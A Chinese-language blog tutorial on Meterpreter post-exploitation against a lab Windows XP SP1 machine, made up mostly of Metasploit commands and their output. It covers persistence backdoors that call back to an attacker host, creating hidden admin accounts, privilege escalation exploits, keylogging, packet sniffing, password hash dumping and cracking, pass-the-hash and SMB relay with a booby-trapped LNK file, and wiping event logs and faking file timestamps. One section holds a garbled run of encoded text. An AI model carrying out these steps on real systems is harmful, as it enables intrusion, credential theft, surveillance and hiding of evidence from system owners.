上一篇文章通過BeEF和Metasploit拿到了一台XP SP1的meterpreter會話

本文就進一步通過Meterpreter來蹂躏下這台可憐的XP

文章較長，可利用目錄

=========================================

1.Meterpreter是什麼？

僅僅是駐留在內存的shellcode。。 大概長這個樣子：

它比一般的攻擊手法要好一些，一般的payload是這麼工作的：

(1)用payload在被攻擊者機上開一個端口A
(2)把命令行終端綁定到A上
(3)攻擊者訪問A，就與被攻擊者機器交互

但這樣的壞處：

(1)建一個新進程，容易被偵查
(2)攻擊者和被攻擊者之間的通信是通過端口互發送數據，容易被IDS偵查
(3)被攻擊者可能chroot（change root directory），限權

meterpreter的優點：

(1)純內存，所有的需要調用的API都是HOOK
(2)16字節一組xor加密，SSL通信封裝傳輸
總之就是不易被發現，什麼平台通用性，可拓展性都是妥妥的。。

2.Meterpreter常用命令

基本命令：

background  # 讓meterpreter處於後台模式
sessions -i index   # 與會話進行交互，index表示第一個session
quit  # 退出會話
shell # 獲得控制台權限
irb # 開啟ruby終端

文件系統命令：

cat c:\\boot.ini   # 查看文件內容
getwd # 查看當前工作目錄 work directory
upload /root/Desktop/netcat.exe c:\\ # 上傳文件到目標機上
download nimeia.txt /root/Desktop/   # 下載文件到本機上
edit c:\\boot.ini  # 編輯文件
search -d c:\\windows -f *.mdb # search 文件

網絡命令：

ipconfig / ifconfig # 查看網絡接口信息
portfwd  add -l 5555 -p 3389 -r 192.168.198.129 # 端口轉發，本機監聽5555，把目標機3389轉到本機5555
root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
route # 獲取路由表信息

系統命令：

ps # 查看當前活躍進程
migrate  pid # 將Meterpreter會話移植到進程數位pid的進程中
execute -H -i -f cmd.exe # 創建新進程cmd.exe，-H不可見，-i交互
getpid # 獲取當前進程的pid
kill pid # 殺死進程
getuid # 查看權限
sysinfo # 查看目標機系統信息，如機器名，操作系統等
shutdown # 關機

寫到這，我們給命令們排個龍虎榜吧：
第一名：ps + migrate ，因為我們是通過IE進來的，如果IE關掉了呢？如果它再也不訪問那個hook頁面了，我們豈不是再也get不了shell了。。 所以應該早早移植到別的進程空間，如Explorer.exe，這它不去關掉吧。。 第二名：execute ，能cmd.exe 第三名：portfwd ，端口轉發，現實中基本都是要轉發的~
看官們，如果你不同意我的看法，可以評論，發表下你的觀點哦~~

3.Meterpreter與後滲透攻擊模塊

一直以為 Meterpreter == Metasploit後滲透攻擊模塊，結果不是這樣的。 科普下Metasploit滲透測試平台的組成：

AUX輔助模塊    信息搜集 
Exploit模塊    滲透攻擊
後滲透模塊     主機控制與拓展攻擊的滲透測試全過程支持

Meterpreter 是Metasploit的一個payload，只是比較強大很多而已。它與後滲透模塊的關系就是，前者是後者的實施通道。 後攻擊模塊使用ruby寫的，目標機上很可能沒有ruby解釋器，那怎麼玩？

4.後門

1)測試是不是虛擬機：

meterpreter > run post/windows/gather/checkvm 

[*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....
[*] This is a VMware Virtual Machine

如果是虛擬機，熱情就下降了。。 也很可能是蜜罐。。

2)安裝後門方法一：

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[*] Persistent agent script is 609628 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agent executed with PID 1888
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

然後它就在目標機的C:/windows/Temp/下建立一個vbs文件，開機會啟動這個文件 上面的vbs的確存在，並且開機啟動也有，但是就是有： vcy087zSyb62q7aro6zJvtfUxvS2r6GjoaMKzqrKssO0bWV0ZXJwcmV0ZXKz9sa3tcS2q873u+HU2nhwz8LV4sO0yN3S17GpwrbE2KO/Cte3sunBy8/Co6xOVFZETcrHd2luIDE20OnE4rv6tcTSu7K/t9ajrMrHd2luIM6qwcvP8s/CvObI3TE2zruzzNDytcTQ6cTiu/qhowq1q8rHu7nKx8zhtb3V4sO0u9jKwqO/CjxzdHJvbmc+1eLA78H0uPa/07DJo6zCt7n9tcS088nxo6zI57n7v7S1vaOsv8nS1Lj4ztK72LTwwvCjvzwvc3Ryb25nPgo8YnI+Cgo8YnI+Cgo8aDI+MymwstewuvPDxbe9t6i2/qO6PC9oMj4KPHByZSBjbGFzcz0="brush:java;">meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter > 監聽：31337 上傳了三個dll文件 然後就在目標機器上多了一個自啟動的服務：Meterpreter。。。


然後連接：

msf  exploit(handler) > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp
msf  exploit(handler) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800

meterpreter > 

4)getgui + 3389

覺得沒什麼用，不就是建立賬戶+加入組：''Remote Desktop Users" 和 "Administrators"，然後3389連接，如果內網就portfwd。。 這裡的沒什麼用還得對面必須開啟了3389。。

meterpreter > run getgui -u aa -p 123qwe 

如果沒出問題的話，應該是添加了用戶aa，密碼為123qwe，並把它加入到那兩個組中。。 然後：

msf  exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389

連上~ 如果在內網，那麼就先端口轉發：

portfwd  add -l 5555 -p 3389 -r 192.168.0.111 # 端口轉發，本機監聽5555，把目標機3389轉到本機5555
root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555

5.提權

1) 直接了當：getsystem

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
		0 : All techniques available
		1 : Service - Named Pipe Impersonation (In Memory/Admin)
		2 : Service - Named Pipe Impersonation (Dropper/Admin)
		3 : Service - Token Duplication (In Memory/Admin)
		4 : Exploit - KiTrap0D (In Memory/User)


meterpreter > 

getsystem會用四種方法去提權，(In Memory/Admin) 表示所需環境和初始權限。

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

system 就是最高權限了。。

2) MS10-073 鍵盤布局文件提權漏洞

meterpreter > background
[*] Backgrounding session 5...
msf > set session 5 
session => 5
msf > use post/windows/escalate/ms10_073_kbdlayout 
msf  post(ms10_073_kbdlayout) > exploit

[*] Attempting to elevate PID 0x278
[*] {"GetLastError"=>0, "return"=>1548}
[*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom ..
[*] Allocated 0x8000 bytes of memory @ 0x60630000
[*] Initialized RWX buffer ...
[*] Current Keyboard Layout: 0x8040804
[*] Patched in syscall wrapper @ 0x60631000
[*] Successfully executed syscall wrapper!
[*] Attempting to cause the ring0 payload to execute...
[*] SendInput: {"GetLastError"=>5, "return"=>1}
[*] Post module execution completed
msf  post(ms10_073_kbdlayout) > 

3) MS10-092 Windows 任務計劃服務提權漏洞

msf  post(ms10_073_kbdlayout) > back
msf > set session 5
session => 5
msf > use post/windows/escalate/ms10_092_schelevator 
msf  post(ms10_092_schelevator) > exploit

[-] Windows XP (Build 2600, Service Pack 1). is not vulnerable.
[*] Post module execution completed
msf  post(ms10_092_schelevator) > 

哎，我就可恥得只能對XP SP1下手。。這點出息。。

6.竊取信息

1) dumplink 竊取近期系統操作，訪問文件等記錄

meterpreter > run post/windows/gather/dumplinks 

[*] Running module against EMASTER-8G5WOLV
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk.
	[*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
[*] No Recent directory found for user LocalService. Nothing to do.
[*] No Recent Office files found for user LocalService. Nothing to do.
[*] No Recent directory found for user NetworkService. Nothing to do.
[*] No Recent Office files found for user NetworkService. Nothing to do.

2) 鍵盤記錄

大部分時候會成功，如果獲取不到重連一下：

meterpreter > keyscan_start 
Starting the keystroke sniffer...
meterpreter > keyscan_dump 
Dumping captured keystrokes...
dir <Return> cd  <Ctrl>  <LCtrl>  zhuomian1 <Back>  <Back>  <Back>  <Back> 11 <Back>  <Back> zhuo <Return> =-1 <Tab>  <Return>  <CapsLock> dir <Return>  <Back>  <Back>  <Back>  <Back>  <Ctrl>  <LCtrl>  dir <CapsLock>  <Back>  <Back> r <Back> ir <Return> 
meterpreter > keyscan_dump 
Dumping captured keystrokes...
 <Return>  <Return>  <N5>  <N6>  <N4>  <N5>  <N4>  <N5>  <N9>  <N1>  <N3>  xugyabq    <Back>  <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl>  <LCtrl> s <Back>  <Back>  <Back>  <Back> emaster <Left> -- <Back>  <Back> _ <Ctrl>  <LCtrl> s
meterpreter > keyscan_stop 
Stopping the keystroke sniffer...
meterpreter > 

3) enum_applications 補丁，更新，殺軟等

meterpreterun > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on EMASTER-8G5WOLV

Installed Applications
======================

 Name                              Version
 ----                              -------
 Adobe Flash Player 11 ActiveX     11.9.900.152
 VMware Tools                      8.1.4.11056
 WebFldrs XP                       9.50.6513
 Windows Installer 3.1 (KB893803)  3.1


[*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt
meterpreter > 

7.系統口令竊取

1) sniffer 網絡嗅探

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces 

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_interfaces  1

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start  1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump  1 /tmp/xpsp1.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 355 packets (101378 bytes)
[*] Downloaded 100% (101378/101378)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/xpsp1.cap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 157 packets (40891 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > 

然後在shell中中輸入：wireshark，加載這個/tmp/xpsp1.cap包即可：

2) IE 緩存

meterpreter > run post/windows/gather/enum_ie 

[*] IE Version: 6.0.2800.1106
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
	File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
	File: C:\Documents and Settings\LocalService\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
meterpreter > 

這裡說IE7以上才有效。。

3) hash抓取並crack

在研究怎麼抓hash前，先對BT5連接數據庫說下：

msf  auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml
[*] exec: cat /opt/metasploit/config/database.yml


#
# These settings are for the database used by the Metasploit Framework
# unstable tree included in this installer, not the commercial editions.
#
development:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5

production:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5
msf  auxiliary(jtr_crack_fast) > db_connect msf3:[email protected]:7337/msf3dev 

連接的格式： db_connect 用戶名:密碼@localhost:端口/數據庫名字 這些都放在/opt/metasploit/config/database.yml中
如果遇到：gem install pg 那麼是配置問題：

vi /opt/metasploit/msf3/msfconsole
change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby in the top of msfconsole.

具體為什麼這麼改可參考：解決過程

至此，數據庫完成，多嘴一句，每次啟動msf要手動db_connect。。
普通做法一：

msf  exploit(handler) > use post/windows/gather/hashdump 
msf  post(hashdump) > set session 1
session => 1
msf  post(hashdump) > exploit

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::


[*] Post module execution completed

普通做法二：

meterpreter > hashdump
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter > 

但是這樣子，這樣的不好之處：

在非sysytem權限下無效。。
在win7，vista，win2008不穩定。。
在UAC（User Account Control）下失效。。

智能做法：

meterpreter > run post/windows/gather/smart_hashdump 

[*] Running module against EMASTER-8G5WOLV
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] 	Obtaining the boot key...
[*] 	Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] 	Obtaining the user list and keys...
[*] 	Decrypting user keys...
[*] 	Dumping password hashes...
[+] 	Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
[+] 	HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
[+] 	SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter > 

智能的流程（當拓展閱讀看看）：

檢查已有權限+系統類型
檢查是否為域控制器
從注冊表讀hash，若失敗，注入LSASS進程；若域控制器，直接注入LSASS進程
若win2008+會話管理員權限，嘗試使用getsystem，若在system不能注入LSASS，先migrate到system權限下的進程，繼續注入LSASS
若win7/Vista+UAC關閉+會話管理員權限，嘗試getsystem，讀取hash
若win2003/xp/2000，直接getsystem，讀取hash

查看數據庫：

msf  auxiliary(jtr_crack_fast) > creds

Credentials
===========

host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
192.168.0.111  445   guest             aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  smb_hash  true
192.168.0.111  445   administrator     123qwe                                                             password  true
192.168.0.111  445   guest                                                                                password  true
192.168.0.111  445   administrator     daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011  smb_hash  true
192.168.0.111  445   helpassistant     866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb  smb_hash  true
192.168.0.111  445   support_388945a0  aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881  smb_hash  true

[*] Found 6 credentials.
msf  auxiliary(jtr_crack_fast) > 

用John The Ripper來破解： 這是一款開源的，集成多個解密算法的，針對Unix/Linux（當然也可以win）弱口令密碼的破解，幸好msf集成這個大殺器。。

msf  post(hashdump) > use auxiliary/analyze/jtr_crack_fast 
msf  auxiliary(jtr_crack_fast) > exploit

[*] Seeded the password database with 6 words...
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 1  time: 0:00:00:06 DONE (Sat Dec  7 14:36:28 2013)  c/s: 5791K  trying: WIT1900 - ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: 123QWE           (cred_1)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:08 DONE (Sat Dec  7 14:36:37 2013)  c/s: 18967K  trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 0  time: 0:00:00:00 DONE (Sat Dec  7 14:36:37 2013)  c/s: 1234K  trying: 89093 - 89092
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
[*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::

[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::

[*] 

[*] 3 password hashes cracked, 2 left

/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)

guesses: 1  time: 0:00:00:20 DONE (Sat Dec  7 14:36:58 2013)  c/s: 10089K  trying: zydeco1900 - 123qwe1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: 123qwe           (cred_1)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 1  time: 0:00:00:09 DONE (Sat Dec  7 14:37:07 2013)  c/s: 17311K  trying: |||}
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 0  time: 0:00:00:00 DONE (Sat Dec  7 14:37:08 2013)  c/s: 1388K  trying: 89030 - 89092
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
[*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::

[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] 

[*] 2 password hashes cracked, 2 left

[+] Cracked: administrator:123qwe (192.168.0.111:445)
[+] Cracked: guest: (192.168.0.111:445)
[*] Auxiliary module execution completed
msf  auxiliary(jtr_crack_fast) > 

可以看到，我在xp設置的弱口令密碼：123qwe已經被破解出來了。。但是這個jtr對於強度較高的密碼沒治。。

8.內網滲透

1)添加路由

很多時候，DMZ跳內網需要跳板，msf的add route很方便就能跳板： 當前會話是1，MSF下：route 內網subnet 子網掩碼 sessionID

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf  auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1
[*] Route added
msf  auxiliary(jtr_crack_fast) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.255.0      Session 1

msf  auxiliary(jtr_crack_fast) > 

這樣子msf就成功得在會話1上添加了192.168.0.0/24 這個網段的路由，所有攻擊者對這網段的流量都通過會話1轉發。

2) 445端口掃描-共享文件/共享打印機服務

通俗點就是IPC$，知道了嗎。。
這個我就貼出命令吧，我感覺沒多大用，掃描用nmap即可。。

msf  auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24 
RHOST => 192.168.0.0/24
msf  auxiliary(jtr_crack_fast) > set PORTS 445
PORTS => 445
msf  auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp 
msf  auxiliary(tcp) > run

莫名的掃不出結果，run後一直靜止。。

3) psexec攻擊445端口-SMB-HASH傳遞

msf  exploit(psexec) > use exploit/windows/smb/psexec 
msf  exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(psexec) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  exploit(psexec) > set LPORT 443
LPORT => 443
msf  exploit(psexec) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf  exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
msf  exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.108:443 
[*] Connecting to the server...
[*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
msf  exploit(psexec) > 

額，這是個失敗的例子，但是如果有人登陸了這台機器，使用了它的SMB服務，而我們設置的SMBPass（這是在其它地方找到的hash）命中，就ok了。。 雖然是靠運氣，但是，靠hash傳遞（而不用crack），也是個好方法。。

4) MS10-046 + MS08-068 + 自己搭建SMB服務器 坐等魚兒上鉤

搭建SMB服務器：

msf  post(droplnk) > use exploit/windows/smb/smb_relay 
msf  exploit(smb_relay) > show options

Module options (exploit/windows/smb/smb_relay):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SMBHOST                      no        The target SMB server (leave empty for originating system)
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(smb_relay) > set SRVHOST 192.168.0.108
SRVHOST => 192.168.0.108
msf  exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(smb_relay) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.108:4444 
[*] Server started.
msf  exploit(smb_relay) > 

MS10-046 LNK快捷方式文件漏洞，貌似能提權

存在於shell32.dll當中，windows的程序加載快捷方式的圖標。當圖標存在於用戶的DLL中時，構造惡意的LNK文件指向這個DLL。。
系統解析沒做好參數驗證，導致用戶DLL被加載執行。。

msf  exploit(psexec) > use post/windows/escalate/droplnk 
msf  post(droplnk) > show options

Module options (post/windows/escalate/droplnk):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ICONFILENAME  icon.png         yes       File name on LHOST's share
   LHOST                          yes       Host listening for incoming SMB/WebDAV traffic
   LNKFILENAME   Words.lnk        yes       Shortcut's filename
   SESSION                        yes       The session to run this module on.
   SHARENAME     share1           yes       Share name on LHOST

msf  post(droplnk) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  post(droplnk) > set session 1
session => 1
msf  post(droplnk) > exploit

[*] Creating evil LNK
[*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk
[*] Done. Wait for evil to happen..
[*] Post module execution completed
msf  post(droplnk) > 

過程：

我們把這個C:\Windows\system32\Words.lnk文件復制到內網共享文件夾中。。坐等別人點擊。。
如果有人同事A點擊了，這個lnk文件，就觸發MS10-046漏洞。。那麼A就訪問我們搭建的惡意SMB服務器，這也就觸發了MS08-068漏洞。。
這兩個漏洞合作，讓人一看就掛。。

拓展閱讀：

NT LAN Manager早期SMB協議在網絡上傳輸明文口令。後來出現 LAN Manager Challenge/Response 驗證機制，簡稱LM，它是如此簡單以至很容易就被破解。微軟提出了WindowsNT挑戰/響應驗證機制，稱之為NTLM。
MS08-068是SMB在處理NTLM的一個漏洞。當目標機訪問攻擊者的惡意SMB服務器時，攻擊者延時發送SMB響應，提取目標機上的NTLM的HASH對目標機進行回重放，達到身份認證的目的。。

9.毀滅證據

1) clearev

meterpreter > clearev
[*] Wiping 148 records from Application...
[*] Wiping 335 records from System...
[*] Wiping 0 records from Security...
meterpreter > 

2) timestomp

meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100666/rw-rw-rw-  0          fil   2013-12-07 16:44:55 +0800  1.txt.txt
100666/rw-rw-rw-  68         fil   2013-12-07 12:28:07 +0800  nimeia.txt

meterpreter > timestomp 1.txt.txt -f nimeia.txt
[*] Setting MACE attributes on 1.txt.txt from nimeia.txt
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100666/rw-rw-rw-  0          fil   2013-12-07 12:28:07 +0800  1.txt.txt
100666/rw-rw-rw-  68         fil   2013-12-07 12:28:07 +0800  nimeia.txt

meterpreter > 

這樣子，修改了文件的時間，也就不容易被人發覺。。





參考文獻：《Metasploit滲透測試魔鬼訓練營》 by 諸葛建偉
emaster，一邊搞網絡安全一邊減肥 歡迎轉載，但請附上本文地址：http://blog.csdn.net/emaste_r/article/details/17119093